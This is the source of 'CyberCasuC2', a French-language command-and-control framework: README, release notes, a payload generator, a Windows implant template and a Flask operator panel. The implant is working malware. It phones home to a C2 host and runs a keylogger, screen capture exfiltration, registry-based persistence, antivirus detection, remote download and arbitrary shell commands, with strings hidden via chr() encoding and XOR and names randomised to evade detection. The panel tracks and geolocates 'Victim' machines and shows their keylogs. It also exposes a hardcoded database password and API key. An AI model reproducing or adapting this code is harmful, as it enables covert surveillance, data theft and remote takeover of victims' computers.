README.md
# CyberCasuC2

## Support

> Obtenir le code

```bash
$ git clone https://github.com/Sploups21/CyberCasuC2/blob/main/README.md
$ cd Client-C2
```

> Démarrer l'application sous Docker

```bash
$ docker-compose pull   # Télécharger les dépendances
$ docker-compose build  # Installation locale
$ docker-compose up -d  # Démarrer l'application 
```

Visiter `http://localhost:85` dans votre navigateur. L'application devrait être opérationnelle.

<br />

## Structure des fichiers du site 

```bash
< PROJECT ROOT >
   |
   |-- apps/
   |    |
   |    |-- home/                          # Répertoire principal
   |    |    |-- routes.py                 # Définition des routes principales
   |    |
   |    |-- authentication/                # Gestion des routes d'authentification (login et register)
   |    |    |-- routes.py                 # Définition des routes d'authentification
   |    |    |-- models.py                 # Definition des modèles d'authentification et d'inscription  
   |    |    |-- forms.py                  # Définition des formulaires d'authentification (login et register) 
   |    |
   |    |-- static/
   |    |    |-- <css, JS, images>         # Fichiers CSS, Javascripts, Images, SCSS
   |    |
   |    |-- templates/                     # Modèles utilisés pour charger les pages
   |    |    |-- includes/                 # Morceaux et composants HTML
   |    |    |    |-- navigation.html      # Composant du menu supérieur
   |    |    |    |-- sidebar.html         # Composant de la barre de navigation
   |    |    |    |-- footer.html          # Pied de page de l'application
   |    |    |    |-- scripts.html         # Scripts communs pour les pages
   |    |    |
   |    |    |-- layouts/                   # Pages Maitre
   |    |    |    |-- base-fullscreen.html  # Utilisé par les pages d'authentication 
   |    |    |    |-- base.html             # Utilisé par les pages communes
   |    |    |
   |    |    |-- accounts/                  # Pages d'authentication 
   |    |    |    |-- login.html            # Page Login 
   |    |    |    |-- register.html         # Page Register
   |    |    |
   |    |    |-- home/                      # Pages du kit d'interface utilisateur
   |    |         |-- index.html            # Page principale (index)
   |    |         |-- 404-page.html         # Page d'erreur 404 
   |    |         |-- console.html          # Page console
   |    |         |-- logout.html           # Page logout
   |    |    
   |    config.py                           # Configurer l'application
   |    __init__.py                         # Initialiser l'application
   |
   |-- requirements.txt                     # Modules de développement - stockage SQLite
   |-- requirements-mysql.txt               # Modules de développement  - Mysql DMBS
   |-- requirements-pqsql.txt               # Modules de développement  - PostgreSql DMBS
   |
   |-- Dockerfile                           # Déploiement
   |-- docker-compose.yml                   # Déploiement
   |-- gunicorn-cfg.py                      # Déploiement   
   |-- nginx                                # Déploiement
   |    |-- appseed-app.conf                # Déploiement 
   |
   |-- .env                                 # Injecter la configuration via l'environnement
   |-- run.py                               # Démarrer l'application - Passerelle WSGI
   |
   |-- ************************************************************************
```




release-notes.txt
########################################
##### Version 1.0.0 - 31 mars 2023 #####
########################################

CyberCasu Software -- C2 CyberCasu

Ressources :

. Client-C2_1.0.zip 
. Generator1.0.py

Prototype :

. Lancement du serveur C2 sur l'IP 170.187.191.105
. Liaison entre le Serveur C2 et la plateforme effectuée
. Generator xll implémenté
. Lancement du GitHub accessible par lien

Nous espérons que cette première version de la plateforme en Flask répondra à vos besoins 
et nous sommes impatients de recevoir vos commentaires et suggestions pour les 
prochaines mises à jour.*

*Cybercasu est un framework C2 open source conçue pour un usage privé uniquement. 
Nous ne sommes pas responsables de l'utilisation de ce logiciel par des tiers et nous ne 
pouvons pas contrôler les actions des utilisateurs. En téléchargeant, installant et 
utilisant Cybercasu, vous assumez la responsabilité de son utilisation et vous acceptez 
de ne pas l'utiliser à des fins illégales ou malveillantes. Nous n'assumons aucune 
responsabilité pour les dommages directs ou indirects causés par l'utilisation de Cybercasu. 
Il est de votre responsabilité de vous conformer à toutes les lois et réglementations 
applicables en matière de sécurité informatique.*


client_generator.py
import random
import string
import os

print("""
                   <-.(`-') (`-')  _  (`-')         (`-')  _ (`-').->                        (`-')  <-. (`-')_ (`-')  _  (`-') (`-')  _(`-')                 (`-')  
 _            .->   __( OO) ( OO).-<-.(OO )_        (OO ).-/ ( OO)_      .->           .->   ( OO).-/  \( OO) )( OO).-<-.(OO ) (OO ).-/( OO).->      .->  <-.(OO )  
 \-,-----.,--.'  ,-'-'---.\(,------,------,\-,-----./ ,---. (_)--\_),--.(,--.       ,---(`-'(,------,--./ ,--/(,------,------,)/ ,---. /    '._ (`-')----.,------,) 
  |  .--.(`-')'.'  | .-. (/ |  .---|   /`. '|  .--./| \ /`.\/    _ /|  | |(`-')    '  .-(OO )|  .---|   \ |  | |  .---|   /`. '| \ /`.\|'--...__( OO).-.  |   /`. ' 
 /_) (`-'(OO \    /| '-' `.(|  '--.|  |_.' /_) (`-')'-'|_.' \_..`--.|  | |(OO )    |  | .-, (|  '--.|  . '|  |(|  '--.|  |_.' |'-'|_.' `--.  .--( _) | |  |  |_.' | 
 ||  |OO )|  /   /)| /`'.  ||  .--'|  .   .||  |OO (|  .-.  .-._)   |  | | |  \    |  | '.(_/|  .--'|  |\    | |  .--'|  .   .(|  .-.  |  |  |   \|  |)|  |  .   .' 
(_'  '--'\`-/   /` | '--'  /|  `---|  |\  (_'  '--'\|  | |  \       \  '-'(_ .'    |  '-'  | |  `---|  | \   | |  `---|  |\  \ |  | |  |  |  |    '  '-'  |  |\  \  
   `-----'  `--'   `------' `------`--' '--' `-----'`--' `--'`-----' `-----'        `-----'  `------`--'  `--' `------`--' '--'`--' `--'  `--'     `-----'`--' '--'
""")

while True:
	if os.path.exists('ressources/client_template.py'):
		C2_IP = input("C2 IP : ")
		C2_PORT = input("C2 PORT : ")

		with open('ressources/client_template.py', 'r') as client_template:
		    data = client_template.read()

		    data = data.replace('METTRE_IP_DU_C2_ICI', C2_IP)
		    data = data.replace('METTRE_PORT_DU_C2_ICI', C2_PORT)

		    for i in range(1,13):
		    	random_string = ''.join(random.choices(string.hexdigits, k=1024))
		    	data = data.replace('COMMTEMPLATE' + str(i), random_string)

		    data = data.replace('mysock', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('myhost', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('myport', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('tmpdir', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('tmplogs', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('command', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('get_response', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('nom_fichier', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('fichier_output', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('myscreenshot', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('logger', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('lien', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('fct_screenshot', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('process_key_press', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('fct_persistence', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('localisation', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('picname', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('result', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('keyboard_listener', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('fct_download', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('len_img', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('img', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('len_logs', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('tmp_logs', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('tmp_pic', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('username', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('hostname', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('req_for_IP', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('IP_addr', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('version_pc', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('identification_string', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('detect_av', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('AV_List', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('key', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('key_bytes', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('encrypted_AV_List', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('AV_dec', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('antivirus', ''.join(random.choices(string.ascii_uppercase, k=32)))
		    data = data.replace('Proc_List', ''.join(random.choices(string.ascii_uppercase, k=32)))

		with open('client.py', 'w') as f:
		    f.write(data)

		break

	else:
		print("[-] The template ressources/client_template.py does not exist !\nPlease be sure to be in the good directory.")
		exit(1)


Client/ressources/client_template.py
#coding:utf-8
import requests
import socket
import os
import subprocess
from PIL import ImageGrab
import pynput.keyboard
import time
import logging
from bs4 import BeautifulSoup
import tempfile
import random
import string
import sys
import psutil

#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1
#COMMTEMPLATE1

def fct_download(url):
	get_response = requests.get(url)
	nom_fichier = url.split("/")[-1]

	try:
		with open(nom_fichier, mode="wb") as fichier_output:
			fichier_output.write(get_response.content)
	except PermissionError:
		os.remove(nom_fichier)
		with open(nom_fichier, mode="wb") as fichier_output:
			fichier_output.write(get_response.content)

def detect_av():
    AV_List = ['2e0a2f15370d065d101b1c', '221d23121311042010110f0b06174d040b10', '021f15361711175d101b1c', '020f05101311055d101b1c',
               '222f253604004f160d06', '011d0302170d155d101b1c', '210c0e093516000111201610005c061916', '0612100b5c061916',
               '050a0a0a01170401465157071d17', '243d3106130d4f160d06', '020f124b171b04', '284e2117043017105b060107',
               '2e1a2335371b045d101b1c', '2d1610111d0d321616160b0b110b4d040b10', '331814231c3017015b060107', '301814361711171a160657071d17',
               '261716000013131a06062a0717040a02165b060107', '342b31245c061916', '393832171b1500100c301c10131b00045d101b1c']
    
    key = chr(99) + chr(121) + chr(98) + chr(101) + chr(114) + chr(99) + chr(97) + chr(115) + chr(117)
    key_bytes = key.encode()
    encrypted_AV_List = []

    AV_dec = []

    for antivirus in AV_List:
        encrypted_bytes = bytes.fromhex(antivirus)
        decrypted_bytes = []

        for i in range(len(encrypted_bytes)):
            key_byte = key_bytes[i % len(key_bytes)]
            decrypted_byte = encrypted_bytes[i] ^ key_byte
            decrypted_bytes.append(decrypted_byte)
        dev_av = bytes(decrypted_bytes).decode()
        AV_dec.append(dev_av)

    Proc_List = ""

    for p in psutil.process_iter():
        Proc_List += p.name() + "\n"

    for antivirus in AV_dec:
        if antivirus in Proc_List:
            return(chr(65) + chr(110) + chr(116) + chr(105) + chr(118) + chr(105) + chr(114) + chr(117) + chr(115) + chr(32) + chr(100) + chr(233) + chr(116) + chr(101) + chr(99) + chr(116) + chr(233) + chr(32) + chr(58) + chr(32) + antivirus)
        else:
            return(chr(65) + chr(117) + chr(99) + chr(117) + chr(110) + chr(32) + chr(97) + chr(110) + chr(116) + chr(105) + chr(118) + chr(105) + chr(114) + chr(117) + chr(115) + chr(32) + chr(100) + chr(233) + chr(116) + chr(101) + chr(99) + chr(116) + chr(233) + chr(46))

#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2
#COMMTEMPLATE2

def fct_screenshot(picname):
	myscreenshot = ImageGrab.grab()
	myscreenshot.save(picname)

def process_key_press(key):
	logging.debug(key)

def fct_persistence():
	localisation = os.environ[chr(116) + chr(101) + chr(109) + chr(112)] + sys.argv[0]
	if not os.path.exists(localisation):
		shutil.copyfile(sys.executable, localisation)
		subprocess.call("\162\145\147\40\141\144\144\40\110\113\105\131\137\103\125\122\122\105\116\124\137\125\123\105\122\134\123\117\106\124\127\101\122\105\134\115\151\143\162\157\163\157\146\164\134\127\151\156\144\157\167\163\134\103\165\162\162\145\156\164\126\145\162\163\151\157\156\134\122\165\156\40\57\166\40\117\156\145\137\104\162\151\166\145\40\57\146\40\57\164\40\122\105\107\137\123\132\40\57\144\40" + '"' + localisation + '"', shell=True)

#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3
#COMMTEMPLATE3

buffer = 1024 * 128

mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4
#COMMTEMPLATE4

myhost = "METTRE_IP_DU_C2_ICI"
myport = METTRE_PORT_DU_C2_ICI

tmpdir = tempfile.gettempdir()

#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5
#COMMTEMPLATE5

try:
	mysock.connect((myhost, myport))

except ConnectionRefusedError:
	time.sleep(300)
	mysock.connect((myhost, myport))

#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6
#COMMTEMPLATE6

username = subprocess.check_output(chr(119) + chr(104) + chr(111) + chr(97) + chr(109) + chr(105), shell=True).decode()
hostname = subprocess.check_output(chr(104) + chr(111) + chr(115) + chr(116) + chr(110) + chr(97) + chr(109) + chr(101), shell=True).decode()
req_for_IP = requests.get(chr(104) + chr(116) + chr(116) + chr(112) + chr(115) + chr(58) + chr(47) + chr(47) + chr(105) + chr(112) + chr(118) + chr(52) + chr(46) + chr(119) + chr(116) + chr(102) + chr(105) + chr(115) + chr(109) + chr(121) + chr(105) + chr(112) + chr(46) + chr(99) + chr(111) + chr(109) + chr(47) + chr(116) + chr(101) + chr(120) + chr(116))
IP_addr = req_for_IP.text
version_pc = subprocess.check_output(chr(119) + chr(109) + chr(105) + chr(99) + chr(32) + chr(111) + chr(115) + chr(32) + chr(103) + chr(101) + chr(116) + chr(32) + chr(118) + chr(101) + chr(114) + chr(115) + chr(105) + chr(111) + chr(110), shell=True).decode().strip().split("\n")[-1]
identification_string = username + ";" + hostname + ";" + IP_addr + ";" + version_pc
mysock.send(identification_string.encode("utf-8"))


while True:
	
	command = mysock.recv(buffer).decode("utf-8")
	
	if command == chr(103) + chr(111) + chr(111) + chr(100) + chr(98) + chr(121) + chr(101):
		mysock.close()
		exit(0)

#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7
#COMMTEMPLATE7

	elif command == chr(112) + chr(101) + chr(114) + chr(115) + chr(105) + chr(115) + chr(116) + chr(101) + chr(110) + chr(99) + chr(101):
		fct_persistence()

	elif command == chr(115) + chr(116) + chr(97) + chr(114) + chr(116) + chr(95) + chr(107) + chr(101) + chr(121) + chr(108) + chr(111) + chr(103) + chr(103) + chr(101) + chr(114):
		tmp_logs = ''.join(random.choices(string.ascii_lowercase, k=8)) + chr(46) + chr(105) + chr(110) + chr(105)
		logger = logging.basicConfig(filename=tmpdir + "\\" + tmp_logs, level=logging.DEBUG, format='%(asctime)s: %(message)s')
		keyboard_listener = pynput.keyboard.Listener(on_press=process_key_press)
		keyboard_listener.start()

#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8
#COMMTEMPLATE8

	elif command == chr(115) + chr(116) + chr(111) + chr(112) + chr(95) + chr(107) + chr(101) + chr(121) + chr(108) + chr(111) + chr(103) + chr(103) + chr(101) + chr(114):
		keyboard_listener.stop()
		len_logs = str(os.path.getsize(tmpdir + "\\" + tmp_logs))
		mysock.send(len_logs.encode("utf-8"))
		with open(tmpdir + "\\" + tmp_logs, "rb") as logs:
			mysock.send(logs.read())
		with open(tmpdir + "\\" + tmp_logs, "w"):
			pass
		pass

	elif command == chr(115) + chr(99) + chr(114) + chr(101) + chr(101) + chr(110) + chr(115) + chr(104) + chr(111) + chr(116):
		tmp_pic = ''.join(random.choices(string.ascii_lowercase, k=8)) + chr(46) + chr(112) + chr(110) + chr(103)
		fct_screenshot(tmpdir + "\\" + tmp_pic)
		len_img = str(os.path.getsize(tmpdir + "\\" + tmp_pic)) 
		mysock.send(len_img.encode("utf-8"))
		
		with open(tmpdir + "\\" + tmp_pic, "rb") as img:
			mysock.send(img.read())
		os.remove(tmpdir + "\\" + tmp_pic)

	elif command == chr(115) + chr(104) + chr(111) + chr(119) + chr(95) + chr(97) + chr(118):
        mysock.send(detect_av().encode("utf-8"))

#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9
#COMMTEMPLATE9

	elif command == chr(99) + chr(100):
		result = subprocess.Popen(chr(99) + chr(100), shell=True, stdout=subprocess.PIPE)
		mysock.send(result.stdout.read())

	elif command[:2] == chr(99) + chr(100):
		
		if os.path.exists(str(command[3:].replace("\n", ""))):
			os.chdir(str(command[3:].replace("\n", ""))) 
			mysock.send(os.popen(chr(99) + chr(100)).read().encode("utf-8"))

#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10
#COMMTEMPLATE10

	elif command == chr(100) + chr(111) + chr(119) + chr(110) + chr(108) + chr(111) + chr(97) + chr(100) + chr(95) + chr(102) + chr(105) + chr(108) + chr(101) + chr(95) + chr(119) + chr(101) + chr(98):
		lien = mysock.recv(buffer).decode("utf-8")
		fct_download(str(lien))

	else:
		pass

#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11
#COMMTEMPLATE11

		r = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
		result = r.communicate() 
		if result[1]: 
			mysock.send(result[1])
		else: 
			mysock.send(result[0])

#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12
#COMMTEMPLATE12


Web_Client_C2_1.0/apps/home/routes.py
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""

from apps.home import blueprint
from flask import render_template,  render_template_string, request
from flask_login import login_required
from jinja2 import TemplateNotFound

import requests
import json
import folium

import pymysql

# Fonction de connexion à la base de données
def connect_mariadb(host, user, password, database, port):
    conn = pymysql.connect(
        host=host,
        user=user,
        passwd=password,
        db=database,
        port=port
    )
    return conn
    
# Connect to the mariadb server
conn = pymysql.connect(host='170.187.191.105', user='C2server', password='putaindePEdemerde', database="server", port=3306, charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor, autocommit=True)

# Authorize the autocommit
conn.autocommit(True)

@blueprint.route('/index')
@login_required
def index():

    # Create a cursor to get SQL requests
    cursor = conn.cursor()
    
    # Get creds
    cursor.execute("SELECT * FROM Victim")

    # Get results
    data = cursor.fetchall()

    # Get list of pos
    coords = []

    
    # Get each position with IP addr
    for machine in data:

        ip = machine['IP'].strip()

        print('IP : ', ip)
        
        req2 = requests.get("https://api.ipgeolocation.io/ipgeo?ip=" + ip + "&apiKey=d962fc74564c4e2083026a4c71ef306a")

        # Les données JSON
        json_data = req2.text

        # Parse data from request
        parsed_data = json.loads(json_data)

        print(parsed_data)

        # Get lat and long
        latitude = parsed_data['latitude']
        longitude = parsed_data['longitude']

        print("lat :", latitude)
        print("long :", longitude)
        
        coordonnees = (latitude, longitude)

        # Add to list
        coords.append(coordonnees)

        print("coords :",coords)
        
    # Zoom initializer
    map = folium.Map(location=[48.8566, 2.3522], zoom_start=13)

    for coord in coords:
        folium.Marker(location=[coord[0], coord[1]]).add_to(map)
    
        
    
    # Close the cursor
    
    cursor.close()
    
    # Open Map Folium
    # Création de la carte
    
    
    
    # Ajout des marqueurs à la carte

    
    
    # Conversion de la carte en HTML
    
    map_html = map._repr_html_()    


    return render_template('home/index.html', segment='index', data=data, map=map_html, len=len, range=range)

@blueprint.route('/console', methods=['GET','POST'])
@login_required    
def console():
    
    dico = ''
    
    if request.method == 'POST':
        
        conn.commit()

        resultat = request.get_json()
        # Récupérer les valeurs des variables id et name de l'URL
        hostname = resultat['hostname']
        name = resultat['name']
        
        print(name, hostname)
    
        # Cursor
        curseur = conn.cursor()


    
        # Queries
        curseur.execute("SELECT * FROM Command WHERE hostname=%s AND nom=%s ORDER BY id DESC LIMIT 1;", (hostname, name))


        # Get Results       
        resultat = curseur.fetchall()
            
        # Close the cursor
        curseur.close()

        print("Resultat : ", resultat)
        
        if resultat:
        
            # Return the result
            return resultat[0]
                          
    # Create a cursor to get SQL requests
    cursor = conn.cursor()
    
    # GET creds
    cursor.execute("SELECT * FROM Victim")

    # Get results
    data = cursor.fetchall()
    
    # Close the cursor
    cursor.close()
    
    return render_template('home/console.html', segment='console', data=data, dico=dico, len=len, range=range)


@blueprint.route('/get_keylogger/<int:id>')
@login_required
def get_keylogger(id):

    # Create a cursor to get SQL requests
    cursor = conn.cursor()

    # Query to get the keylogger value for a given id
    cursor.execute("SELECT keylogger FROM Victim WHERE id=%s", (id,))
    
    # Get the result
    result = cursor.fetchone()
    
    # Close the cursor
    cursor.close()

    print("Resultat 1 : ", result)
    print("Resultat 2 : ", result['keylogger'])

    return str(result['keylogger'])  


@blueprint.route('/<template>')
@login_required
def route_template(template):

    try:

        if not template.endswith('.html'):
            template += '.html'

        # Detect the current page
        segment = get_segment(request)

        # Serve the file (if exists) from app/templates/home/FILE.html
        return render_template("home/" + template, segment=segment)

    except TemplateNotFound:
        return render_template('home/page-404.html'), 404

    except:
        return render_template('home/page-500.html'), 500


# Helper - Extract current page name from request
def get_segment(request):

    try:

        segment = request.path.split('/')[-1]

        if segment == '':
            segment = 'index'

        return segment

    except:
        return None
